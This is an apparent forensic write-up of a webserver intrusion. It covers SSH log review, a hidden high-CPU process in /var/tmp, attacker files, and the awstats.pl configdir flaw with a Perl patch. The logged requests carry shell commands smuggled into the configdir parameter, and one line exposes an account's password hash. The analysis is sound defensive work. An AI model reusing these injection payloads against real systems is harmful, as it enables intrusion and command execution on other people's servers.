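# List successful SSH logins recorded in the auth log. grep reads the file
# directly: the pager in front of it added nothing once its output was piped,
# and a missing or unreadable log now surfaces as grep's own error status.
# NOTE(review): rotated copies of the log are not searched by this command.
# On a host suspected of compromise a known-good grep binary is preferable;
# the later steps of this write-up run ls from /mnt/bin, presumably for the
# same reason.
grep -- 'Accepted' /var/log/secure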
Oct 3 03:10:25 webserver sshd[20701]: Accepted password for mail from 62.17.163.186 port 53349 ssh2
mail:$1$kCEd3yD6$W1evaY5BMPQIqfTwTVJiX1:15400:0:99999:7:::
nobody 22765 1 6 Sep29 ? 4-00:11:58 .t
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22765 nobody 15 0 1740m 1362m 1228 S 98.3 91.5 2892:19 .t
[root@webserver ~]# /mnt/bin/ls -al /proc/22765/exe
lrwxrwxrwx 1 root root 0 Sep 29 22:09 /proc/22765/exe -> /var/tmp/.../apa/t
[root@webserver ...]# /mnt/bin/ls -al
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 apa
-rw-r--r-- 1 nobody nobody 0 Sep 29 22:09 apa.tgz
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 caca
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 haha
-rw-r--r-- 1 nobody nobody 0 Sep 29 22:10 kk.tar.gz
-rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 login
-rw-r--r-- 1 nobody nobody 0 Sep 29 22:10 login.tgz
-rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 z
./z 62.17.163.186
62.17.163.186 - - [29/Sep/2013:22:17:06 +0800] "GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;ps+-aux%00 HTTP/1.0" 200 12333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0"
62.17.163.186 - - [29/Sep/213:22:17:35 +0800] "GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;cd+/var/tmp/.../haha;ls+-a%00 HTTP/1.0" 200 1626 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0"
# Pre-patch handling of the configdir query parameter: the captured value is
# URL-decoded and stored in $DirConfig with no character filtering, so shell
# metacharacters such as the "|" and ";" in the logged requests are kept.
# NOTE(review): how $DirConfig is consumed afterwards is not shown here.
if ($QueryString =~ /configdir=([^&]+)/i) {
    $DirConfig = &DecodeEncodedString("$1");
}
修改为如下即可:
# Patched handling of the configdir query parameter: after URL-decoding, the
# tr/// with /c (complement) and /d (delete) leaves only characters from the
# allow-list a-z 0-9 _ - / . in $DirConfig, so "|" and ";" are dropped.
# NOTE(review): "/" and "." remain allowed, so "../" sequences pass through
# this filter unchanged, and uppercase letters are removed; confirm both are
# acceptable for the configured directory layout.
if ($QueryString =~ /configdir=([^&]+)/i) {
    $DirConfig = &DecodeEncodedString("$1");
    $DirConfig =~ tr/a-z0-9_\-\/\./a-z0-9_\-\/\./cd;
}